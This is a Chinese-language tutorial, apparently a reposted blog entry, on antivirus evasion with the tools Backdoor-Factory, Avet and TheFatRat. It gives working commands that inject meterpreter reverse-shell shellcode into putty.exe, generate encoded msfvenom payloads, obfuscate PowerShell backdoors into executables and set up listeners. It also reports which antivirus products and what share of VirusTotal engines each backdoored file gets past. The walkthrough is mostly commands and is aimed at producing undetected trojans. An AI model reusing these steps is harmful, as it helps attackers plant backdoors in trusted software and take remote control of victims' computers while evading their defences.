參考資料

利用BDF向EXE文件植入后門:https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91EXE%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/

backdoor-factory使用簡介：https://www.lstazl.com/backdoor-factory%E4%BD%BF%E7%94%A8%E7%AE%80%E4%BB%8B/

backdoor-factory使用：https://www.cnblogs.com/-qing-/p/11421709.html

Msf木馬過狗免殺之利用Avet過20+狗：https://zhuanlan.zhihu.com/p/38813500

AntiVirus Evasion Tool(avet)測試分析:https://3gstudent.github.io/3gstudent.github.io/AntiVirus-Evasion-Tool(avet)%E6%B5%8B%E8%AF%95%E5%88%86%E6%9E%90/

TheFatRat 一款簡易后門工具：https://www.zhuanzhi.ai/document/22f6e03336336de7f211ac7b97c2fb0f

TheFatRat – 跨平臺反彈后門Shell生成神器：http://caidaome.com/?post=198

BackDoor-Factory

介紹

BackDoor-factory，又稱后門工廠(BDF)，BDF是也是一款老牌的免殺神器，其作者曾經在2015年的blackhat大會上介紹過該工具。但是作者已經于2017年停止更新，免殺效果就算現在來看也還算不錯的。

原理：可執行二進制文件中有大量的00,這些00是不包含數據的,將這些數據替換成payload,并且在程序執行的時候,jmp到代碼段,來觸發payload

安裝

官方地址：

https://github.com/secretsquirrel/the-backdoor-factory

?方法一、

apt update apt install backdoor-factory

kali集成的是最新版本

后來實際使用時候發現，之前好用的putty竟然被識別不是PE文件，WTF!!!!!

所以改用了github上的

git clone https://github.com/secretsquirrel/the-backdoor-factory

問題解決

方法二、docker

systemctl daemon-reload systemctl restart docker docker pull secretsquirrel/the-backdoor-factory docker run -it secretsquirrel/the-backdoor-factory bash # ./backdoor.py

docker里的版本為3.4.0,不算是最新版本，不過影響不大。

但是docker拖文件有點小麻煩，所以我最后使用了github方式進行試驗以及操作

直接生成免殺后門(VT免殺率37/71)

在"捆綁"之前，BDF需要檢查一下宿主exe能否被支持"插入"shellcode。

檢查

python backdoor.py -f /root/test/putty.exe -S

說明可以被支持

搜索該文件可用的Code Caves(代碼縫隙)

./backdoor.py -f /root/test/putty.exe -c -l 600 #-c：code cave(代碼裂縫 #-l：代碼裂縫大小

發現有三個代碼縫隙，一般shellcode大小300個字節，所以選擇一個適當的縫隙就行

獲取該文件的可用payload

./backdoor.py -f /root/test/putty.exe -s -show

cave_miner_inline:作為payload模板，長度為135，僅實現了控制流程跳轉，不做其他操作，可用作自定義開發shellcode的模板

reverse_shell_tcp_inline：對應的msf：use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp

meterpreter_reverse_https_threaded：對應的msf：use exploit/multi/handlerset payload windows/meterpreter/reverse_https

iat_reverse_tcp_inline中的iat：iat為Import Address Table(導入地址表)的縮寫，如果PE文件的IAT不包含API LoadLibraryA和GetProcAddress，直接執行payload?reverse_shell_tcp_inline會失敗，iat_reverse_tcp_inline增加了修復IAT的功能，避免執行失敗

iat_reverse_tcp_stager_threaded:增加了修復IAT的功能

user_supplied_shellcode_threaded：對應的msf：use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp``自定義shellcode

生成payload

./backdoor.py -f /root/test/putty.exe -H 192.168.42.138 -P 3333 -s reverse_shell_tcp_inline --可以正常上線 #./backdoor.py -f /root/test/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.42.138 -P 3333 -J -o bdf_backdoor.exe --大佬的poc，我用復現沒有成功 #-c：code cave(代碼裂縫) #-l：代碼裂縫大小 #-s：選擇使用 payload 類型 #-H：選擇回連服務器地址 #-P：回連服務器端口 #-J：使用多代碼裂縫注入

選擇裂縫的地方進行插入，然后輸出到了 backdoored文件夾下

?

msf上監聽

handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_tcp

?過了360.但沒有過火絨

?

上vt：

效果一般，不過過了騰訊和360，算是小驚喜，可以當炮灰馬去玩玩，而且這個shellcode插入的位置和免殺效果關系很大，大佬的poc我沒有復現成功，到時候可以再加一些其他的參數，可能效果會更好一點

使用自己定義的shellcode(VT免殺率30/69)

先用msfvenom生成raw格式的shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.42.138 LPORT=3333 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c

使用backdoor的user_supplied_shellcode_threaded模塊加載自定義的shellcode

./backdoor.py -f /root/test/putty.exe -s user_supplied_shellcode_threaded -U /root/test/shellcode.c -o bdf_c.exe

可以正常上線，仍然是可以過360，但是不能過火絨

上vt：

還是可以過360和騰訊，其他的不行，這種注入類型的工具跟注入的位置有密切的關系

小結

利用backdoor-factory使用，用戶可以在不破壞原有可執行文件的功能的前提下，在文件的代碼裂隙中插入惡意代碼Shellcode。當可執行文件被執行后，就可以觸發惡意代碼。Backdoor Factory不僅提供常用的腳本，還允許嵌入其他工具生成的Shellcode，如Metasploit。

該工具還有很強大的一些其他功能，比如加私鑰證書、CPT等等，雖然目前軟件已經不再更新，但免殺效果至今依然不錯也能管中窺豹看到它的強悍之處。

?

?

Avet免殺(VT免殺率30/70)

介紹

Avet全稱AntiVirus Evasion Tool，2017年在blackhat大會上公開演示，可對shellcode，exe和dll等多種載荷進行免殺處理，使用了多種不同的免殺技術，具有較好的免殺效果，據說在blackhat大會上演示時免殺效果震撼全場。

安裝

git clone https://github.com/govolution/avet

#如果是64位系統，可以直接使用下面命令來進行安裝
./setup.sh
安裝后執行python ./avet_fabric.py即可。
#看起來沒什么問題，但是有時候在最后生成exe時會報錯。。報錯后還可以選擇手動安裝，逐個排除錯誤。

setup.sh會在/etc/apt/source.list里面添加三個源，然后apt update巨慢，所以我選擇了手動安裝，大家可以先應用setup.sh試一下，如果不好使，可以嘗試下面的手動安裝

git clone https://github.com/govolution/avet dpkg --add-architecture i386 apt-get update apt-get install wine -y apt-get install wine32 -y wget -c --no-check-certificate https://nchc.dl.sourceforge.net/project/tdm-gcc/TDM-GCC%20Installer/tdm64-gcc-5.1.0-2.exe wine tdm64-gcc-5.1.0-2.exe

別問我咋知道的，選擇create

我選的第二個，看個人

然后python3 avet_fabric.py即可運行，運行后顯示了它支持的各個模塊

我們選擇了7，7: build_50xshikata_revhttps_win32.sh

之后ip和端口要修改一下

然后輸出到了output文件夾下

測試一下

kali里面監聽：

handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_https

可以正常上線

被火絨干掉了，但是360可以繞過

上vt：

果然這種類型的文章一發出來，查殺率就直線上升，不過沒關系，攻防間的對抗總是這么interesting

?

TheFatRat免殺

介紹

TheFatRat創建的后門或者payload，可以在Linux，Windows，Mac和Android上等多種平臺上執行，可生成exe、apk、sh、bat、py等多種格式。TheFatRat可以和msf無縫對接，并且集成內置了Fudwin、Avoid、backdoor-factory等多個免殺工具，對powershell的免殺姿勢尤其多樣。

安裝

git clone https://github.com/Screetsec/TheFatRat cd TheFatRat chmod +x setup.sh && ./setup.sh

使用

fatrat

下面是重劍無鋒大佬給的翻譯

[01] Create Backdoor with msfvenom #01：直接利用msf來生產后門，基本不能免殺 [02] Create Fud 100% Backdoor with Fudwin 1.0#02：使用Fudwin 1.0創建powershell后門，ps1利用powerstager混淆，從結果來看效果不錯 [03] Create Fud Backdoor with Avoid v1.2 # 03: 使用Avoid v1.2創建后門 [04] Create Fud Backdoor with backdoor-factory [embed] #04：使用backdoor-factory創建后門 [05] Backdooring Original apk [Instagram, Line,etc] #05：生成安卓使用的apk后門 [06] Create Fud Backdoor 1000% with PwnWinds [Excelent] #06：綜合了多種方式，可生成bat、exe、dll、ps1等，可利用c、C#多種語言編譯，官方非常推薦，但經嘗試免殺效果一般，肯定是被殺軟列入特征庫了 [07] Create Backdoor For Office with Microsploit #07：生成office類后門 [08] Trojan Debian Package For Remote Access [Trodebi]#08：生成linux后門

其實在TheFatRat的github頁面上給了很多利用的視頻以及pdf之類的東西，大家如果有興趣可以去看一看

由于01是直接調用了msfvenom生成payload，只不過稍微進行了多個msfvenom編碼，免殺效果肯定一般

但是我還是準備試一下：

結果不能上線，不知道是我環境的問題還是軟件的問題

02-powershell混淆-1(VT免殺率25/71)

先選2

然后選1，利用powerstager混淆，并將powershell編譯成exe。

這里要注意兩點，一是

這里的文件名后綴一定要填

二是python要裝names的包

如果還是生成錯誤，建議去查看TheFatRat/logs/fudwin.log看看有什么報錯信息

生成成功后進行測試，會彈出來這個窗口

大佬測試是可以正常上線的，可能是我的環境有問題，我的139（裸奔）機器并不會有任何相應，141（火絨）機器會上線，但是之后立刻掉線，好像之前也遇到過這種情況

心情是崩潰的?

360和火絨都會提示對powershell進行了操作，而我們確實操作了powershell

?

看看vt吧。。。。

竟然連江民都沒過，卻過了360，不過360提示操作了powershell。。。

02-powershell混淆-2

這回選2，slow but powerfull。

由于機器原因，這個效果如圖：

亂碼亂成這樣，玩個錘子，以后有時間繼續深搞，有興趣的大佬可以自己折騰一下，心累了。。。。。。。。。。

就不傳vt了，沒什么參考意義，但是看重劍無鋒大佬操作的，效果不算差，到時候再操作一波

06-使用TheFatRat編譯C#+powershell生成exe(VT免殺率38/71)

應用了[06] ?Create Fud Backdoor 1000% with PwnWinds [Excelent]

選擇了2，用c#+powershell來生成exe

還是和上面一樣的操作

c#代碼生成成功

測試一下，可以正常上線

但是執行的時候，火絨和360都提示執行了powershell命令，但是靜態的都沒有被殺，可以正常上線

上vt：

又試了一下bat和dll，其中bat正常上線，dll上線后死掉，bat是28/59，dll是3/70

總結

TheFatRat創建的后門格式和支持的平臺比較多樣化，而且還支持生成CDROM/U盤中能自動運行(生成AutoRun文件)的后門文件，并且可以對payload更改圖標，具有一定偽裝效果。

TheFatRat的很多免殺方式是借助于msfvenom編碼、upx等加殼壓縮、c/c#編譯等將powershell混淆后編譯成exe或bat文件，但有些在執行時還是會調用powershell，而powershell的調用已經被各大殺軟盯的很緊了，所以查殺效果只能算是一般了。

ps：就是安裝包有點大，powershell確實有點難作為免殺的方向了

?

?

?

?

總結

以上是生活随笔為你收集整理的TideSec远控免杀学习四（BackDoor-Factory+Avet+TheFatRat）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。